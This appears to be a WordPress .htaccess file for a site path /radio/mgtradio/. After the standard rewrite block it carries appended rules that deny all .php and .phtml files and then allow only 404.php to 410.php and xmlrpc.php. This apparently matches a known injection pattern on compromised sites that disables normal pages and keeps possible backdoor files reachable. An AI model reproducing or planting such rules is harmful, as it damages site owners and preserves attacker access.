
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /radio/mgtradio/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /radio/mgtradio/index.php [L]
</IfModule>

# END WordPress
<FilesMatch ".*\.(phtml|php)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(404|405|406|407|408|409|410|xmlrpc).php$">
Order Allow,Deny
Allow from all
</FilesMatch>